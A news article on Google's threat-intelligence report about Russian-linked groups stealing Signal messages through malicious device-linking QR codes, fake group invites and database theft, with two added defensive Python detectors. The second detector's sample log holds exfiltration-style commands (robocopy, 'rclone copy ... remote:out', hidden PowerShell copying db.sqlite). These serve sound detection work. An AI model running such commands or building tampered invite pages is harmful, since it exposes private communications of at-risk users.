Technology

"Safe" messenger attacked by hackers: how data is stolen through Signal - investigation

In brief: QR codes, group invitations that appear to come from trusted contacts, fake instructions for users: all of this is only part of the methods in the arsenal of Russian cybercriminals. Some of the effort was aimed at the military, for which the attackers learned to imitate the Kropyva artillery app. Russian hackers are trying to steal data through the Signal messenger, an app known for its high security.

This is stated in a report by Dan Black, head of cyber-espionage analysis at Google Cloud's Mandiant, published on February 20 under the name of the Google Threat Intelligence Group (GTIG), the Google team that deals with cybersecurity threats. The attacks are reported to be focused on persons who "are of interest to Russian special services". GTIG expects that the tactics and methods hackers are now using against Signal will become more common in the future, including beyond the Ukrainian theater of war.

Signal is popular among servicemen, politicians, journalists, activists and other at-risk groups, which makes the app a valuable target for cybercriminals. To seize confidential information, they resort to tricks. The newest and most common technique is abuse of "linked devices", the feature that lets one account be used from, say, a phone and a tablet at the same time. To connect an additional device, the user scans a special QR code.

Hackers create malicious QR codes; a user who scans one links their own account to the attacker's device. As a result, all messages arrive at the attacker in real time, giving a permanent eavesdropping channel. Often the malicious QR codes were disguised as real Signal resources, such as group invitations, security notifications or device-pairing instructions. In more specialized operations, hackers built fake web pages disguised as applications for the military, with the QR codes already embedded in them.

The hacker group APT44 (also known as Sandworm or Seashell Blizzard, and associated with the GRU's Main Centre for Special Technologies) has worked to exploit devices captured from soldiers at the front. In effect, when the invaders get hold of a Ukrainian serviceman's smartphone, the Signal account on it is linked to a server they control. Beyond reading other people's messages even after the phone is no longer in his hands, the attacker can pass himself off as the owner.

It is noted that once attackers gain access this way, they can keep it for a long time. The reason is the lack of centralized monitoring for this kind of linking, so the "extra" device can go unnoticed for a long time. The Russian espionage group UNC5792 tampered with Signal "group invitation" pages: hackers used modified "invitations" to Signal groups designed to look identical to the real ones.

However, in the fake group invitations the JavaScript code that normally redirects the user to the group was replaced with a malicious block. It contained the uniform resource identifier (URI) that Signal uses to link a new device. That is, the victims of such attacks thought they were joining a Signal group, when in fact they were giving hackers full access to their accounts. Another Russia-linked hacker group is UNC4221.
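The substitution described above is easy to catch once the QR code or redirect has been decoded to text: a genuine group invite resolves to Signal's group-join link, while a device-linking request resolves to Signal's provisioning URI. The following triage helper is an added example written for this page, not code from the GTIG report or from Signal. The URI shapes it relies on are Signal's public ones (group invites use `https://signal.group/#<token>`, device provisioning uses `sgnl://linkdevice?uuid=...&pub_key=...`); the page snippets and tokens in it are constructed for the example.

```python
"""Triage decoded QR/link payloads that claim to be Signal group invites.

Added example, not code from the GTIG report or from Signal. The URI shapes
are Signal's public ones: group invites use https://signal.group/#<token>;
the device-provisioning (linking) request uses
sgnl://linkdevice?uuid=<id>&pub_key=<key>. Every sample below is constructed.
"""
import re
from urllib.parse import unquote, urlparse

# Signal-looking URIs, either plain or with ':' and '//' percent-encoded.
URI_RE = re.compile(r"(?:sgnl|https?)(?::|%3A)(?://|%2F%2F)[^\s'\"<>]+", re.IGNORECASE)


def classify_signal_uri(uri: str) -> str:
    """Return 'group-invite', 'device-link' or 'other' for one decoded URI."""
    p = urlparse(unquote(uri.strip()))       # undo one layer of %-encoding first
    scheme, host = p.scheme.lower(), p.netloc.lower()
    if scheme == "sgnl" and host == "linkdevice":
        return "device-link"                 # would add the scanning party as a linked device
    if scheme in ("https", "sgnl") and host == "signal.group":
        return "group-invite"
    return "other"


def triage_invite_page(page_source: str) -> list[tuple[str, str]]:
    """Pull every Signal-looking URI out of an invite page (HTML, or just the
    JavaScript that performs the redirect) and classify each one."""
    return [(u, classify_signal_uri(u)) for u in URI_RE.findall(page_source)]


def page_links_device(page_source: str) -> bool:
    """True when a page presented as a group invite actually carries a
    device-linking URI, i.e. the swap described in the report."""
    return any(kind == "device-link" for _, kind in triage_invite_page(page_source))


# Constructed samples: a benign invite redirect and a tampered one.
LEGIT_INVITE_JS = 'window.location.href = "https://signal.group/#CjQKIExampleTokenOnly";'
TAMPERED_INVITE_JS = (
    'window.location.href = "sgnl://linkdevice?uuid=00000000-0000-4000-8000-000000000000'
    '&pub_key=BExampleKeyOnly";'
)

if __name__ == "__main__":
    for label, src in (("legit", LEGIT_INVITE_JS), ("tampered", TAMPERED_INVITE_JS)):
        verdict = "LINKS DEVICE" if page_links_device(src) else "ok"
        print(label, triage_invite_page(src), verdict)
```

The check only looks at where a link or QR code actually points, which is the one thing the lookalike page cannot hide. The manual equivalent, for a user who suspects they have already scanned something, is to open Signal's Linked Devices settings and remove any device they do not recognize; that review is not mentioned in the article but follows from the point above that an extra device otherwise goes unnoticed.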

Its efforts were concentrated on Ukrainian servicemen. The hackers developed a fake version of components of Kropyva (the name means "nettle"), the app the Armed Forces of Ukraine use for artillery guidance. The goal was again to steal data from Signal. In addition, the hackers tried to disguise the device-linking request as a group invitation from a trusted contact.

Different variations of such phishing attacks were recorded: the cybercriminals used a special piece of code, PINPOINT, that collected basic information about the user and their geolocation through the browser's Geolocation API. The hackers also worked on stealing Signal database files. These attacks targeted Android and Windows. APT44 used the WAVESIGN tool, which regularly queries the database; Rclone then uploaded the query results containing the most recent messages.

The Infamous Chisel malware, also probably created by Sandworm, searched Android devices for Signal-related files to steal. The Turla group, which the US and the United Kingdom attribute to FSB Center 16, used a special PowerShell script to obtain messages from Signal Desktop after infecting a machine. UNC1151, linked to Belarus, used the Robocopy utility to copy files from Signal Desktop for later exfiltration.
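What WAVESIGN, the Turla PowerShell script and the UNC1151 Robocopy usage above have in common is that an ordinary system tool, not Signal itself, reads Signal Desktop's local store. That makes a simple detection possible on process-creation telemetry. The following is an added example written for this page, not detection logic from GTIG or from any of the reports it cites. It assumes only the well-known locations of Signal Desktop's store (the `sql\db.sqlite` database and `config.json` under the Signal profile directory, `%APPDATA%\Signal` on Windows and `~/.config/Signal` on Linux); the log format and every log line are constructed.

```python
"""Flag non-Signal processes that reference Signal Desktop's local store.

Added example, not detection logic from the GTIG report. Signal Desktop keeps
its message database at <profile>\\sql\\db.sqlite with the database key in
<profile>\\config.json (profile = %APPDATA%\\Signal on Windows,
~/.config/Signal on Linux). The CSV format and all rows below are constructed.
"""
import csv
import io
import re

# Any reference to the Signal profile's sql directory or its config.json.
SIGNAL_STORE_RE = re.compile(r"(?i)[\\/]Signal[\\/](?:sql\b|config\.json)")
# Process images expected to open those files.
EXPECTED_IMAGES = {"signal.exe", "signal-desktop"}

# Constructed process-creation log; the rows mirror the tooling named in the
# article (Robocopy, Rclone, PowerShell) plus a Linux rsync for comparison.
SAMPLE_LOG = r"""ts,user,image,command_line
2025-02-20T08:00:01Z,alice,C:\Users\alice\AppData\Local\Programs\signal-desktop\Signal.exe,Signal.exe --user-data-dir=C:\Users\alice\AppData\Roaming\Signal
2025-02-20T08:03:40Z,alice,C:\Windows\explorer.exe,explorer.exe
2025-02-20T08:05:12Z,alice,C:\Windows\System32\Robocopy.exe,robocopy C:\Users\alice\AppData\Roaming\Signal\sql C:\ProgramData\stage db.sqlite
2025-02-20T08:06:01Z,alice,C:\ProgramData\rclone.exe,rclone copy C:\Users\alice\AppData\Roaming\Signal\sql remote:out
2025-02-20T08:07:30Z,alice,C:\Windows\System32\cmd.exe,cmd /c type C:\Users\alice\AppData\Roaming\Signal\config.json
2025-02-20T08:09:14Z,alice,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,powershell -nop -w hidden -c Copy-Item $env:APPDATA\Signal\sql\db.sqlite C:\Users\Public\s.db
2025-02-20T09:12:05Z,bob,/usr/bin/rsync,rsync -a /home/bob/.config/Signal/sql/ /tmp/x/
"""


def image_name(path: str) -> str:
    """Basename of a Windows or POSIX image path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def find_signal_store_access(log_text: str) -> list[dict]:
    """Return one alert per row where a process outside EXPECTED_IMAGES names
    the Signal Desktop store in its command line."""
    alerts = []
    for row in csv.DictReader(io.StringIO(log_text.strip())):
        name = image_name(row["image"])
        hit = SIGNAL_STORE_RE.search(row["command_line"])
        if hit and name not in EXPECTED_IMAGES:
            alerts.append({"ts": row["ts"], "user": row["user"],
                           "image": name, "artifact": hit.group(0)})
    return alerts


if __name__ == "__main__":
    for a in find_signal_store_access(SAMPLE_LOG):
        print(f"{a['ts']} {a['user']} {a['image']} -> {a['artifact']}")
```

The rule is deliberately path-based, which is also its limit: the Robocopy row is caught because it names the Signal directory, but a later tool that only uploads the staged copy (Rclone reading from `C:\ProgramData\stage`) would not be, so in practice the staged destination from the first alert should be fed back in as a second indicator.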

Google has given advice on how to protect personal devices from such attacks: iPhone users are recommended to consider switching on Lockdown Mode. "We are grateful to the Signal team for close cooperation in investigating this activity. The latest Signal and iOS versions contain enhanced features intended to protect against such phishing campaigns in the future. Update to the latest version to turn on these features," GTIG said.